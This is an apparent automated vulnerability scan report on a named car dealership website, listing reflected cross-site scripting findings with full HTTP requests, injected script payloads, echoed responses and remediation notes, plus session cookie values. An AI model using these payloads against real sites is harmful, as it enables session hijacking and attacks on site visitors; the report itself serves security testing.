Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973629.1302976747.3; __utmc=124194511; __utmb=124194511.3.7.1302979441461

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14369
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:46:44 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
g src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/specials84e55"><script>alert(1)</script>ddb4d93f836/finance.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0
...[SNIP]...

1.11. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fbd"><script>alert(1)</script>ad12aacef3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory98fbd"><script>alert(1)</script>ad12aacef3c/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14373
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:01:18 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
"http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/used-inventory98fbd"><script>alert(1)</script>ad12aacef3c/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

1.12. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBbodystyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload ae6b1<script>alert(1)</script>43130dd7918 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clearae6b1<script>alert(1)</script>43130dd7918&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:17 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37157

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz clearae6b1<script>alert(1)</script>43130dd7918 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

1.13. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmake parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 5c1f3<script>alert(1)</script>161a7b5aa82 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz5c1f3<script>alert(1)</script>161a7b5aa82&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37181

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz5c1f3<script>alert(1)</script>161a7b5aa82 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

1.14. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmodel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload e5131<script>alert(1)</script>a0d520f6586 was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=cleare5131<script>alert(1)</script>a0d520f6586&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:12 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz cleare5131<script>alert(1)</script>a0d520f6586 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

1.15. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e682'-alert(1)-'ef04afa0abc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6e682'-alert(1)-'ef04afa0abc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:35:10 GMT
Connection: close
Set-Cookie: ssoid=6118db350a0a002f005f07e8b6cd8671;path=/
Set-Cookie: JSESSIONID=4tpik3cqg96gk;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86751

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=6e682'-alert(1)-'ef04afa0abc',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

1.16. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5690f"><script>alert(1)</script>bc22e994a68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5690f"><script>alert(1)</script>bc22e994a68
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:35:04 GMT
Connection: close
Set-Cookie: ssoid=6118c4780a0a002f005f07e8de15bd02;path=/
Set-Cookie: JSESSIONID=25aep0xbvapjr;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86781

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5690f"><script>alert(1)</script>bc22e994a68&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=6118c4780a0a002f005f07e8de15bd02&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&a
...[SNIP]...

1.17. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 820c4"><script>alert(1)</script>48f2540543a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=820c4"><script>alert(1)</script>48f2540543a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:47 GMT
Connection: close
Set-Cookie: ssoid=5f44ada50a0a002f005f07e8f4120276;path=/
Set-Cookie: JSESSIONID=9a34h8dp52u7n;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86781

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=820c4"><script>alert(1)</script>48f2540543a&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=5f44ada50a0a002f005f07e8f4120276&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&a
...[SNIP]...

1.18. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fa27'-alert(1)-'bad3f5b4489 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fa27'-alert(1)-'bad3f5b4489
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:51 GMT
Connection: close
Set-Cookie: ssoid=5f44bbc10a0a002f005f07e84766f648;path=/
Set-Cookie: JSESSIONID=51er345s2l9rv;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86751

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=5fa27'-alert(1)-'bad3f5b4489',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:02:39 GMT
Connection: close
Set-Cookie: ssoid=5f43a30f0a0a002f005f07e8eb6904d2;path=/
Set-Cookie: JSESSIONID=wk3u7l498ldc;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86689

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...

3. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:02:39 GMT
Connection: close
Set-Cookie: ssoid=5f43a30f0a0a002f005f07e8eb6904d2;path=/
Set-Cookie: JSESSIONID=wk3u7l498ldc;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86689

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=5f43a30f0a0a002f005f07e8eb6904d2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&amp;63-0=INDEX" alt="tracking image" style="position:absolute;visibility:hidden;" /></div>
   </noscript>

<!--[if IE 6]>
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/tools/no-flicker.pack.js?1243439681000"></script>
   <div id="fixedWrap">
<![endif]-->

<div id="misc1"></div>


<div id="cWrap1"><div id="cWrap2">
<div id="container" class="t1">
<div id="hWrap1">
<div id="hWrap2">
<div id="header">

<div id="hMovieWrap" class="vcard">
           <div id="fLogoWrap">
           <ul id="fLogo">
                                           <li>
                   <img src="http://static.dealer.com/v8/global/images/franchise/black/logo-mercedes-med.png?1294690861000" alt="mercedes" />
               </li>
                   </ul>
   </div>


<!--[if IE 6]>
   <style type="text/css">
   /*<![CDATA[*/
       * html #fLogoWrap img{
           position:relative;
           behavior: expression((this.runtimeStyle.behavior="none")&&(this.pngSet?this.pngSet=true:(this.nodeName == "IMG" && this.src.toLowerCase().indexOf('.png')>-1?(this.runtimeStyle.backgroundImage = "none",
               this.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + this.src + "', sizingMethod='image')",
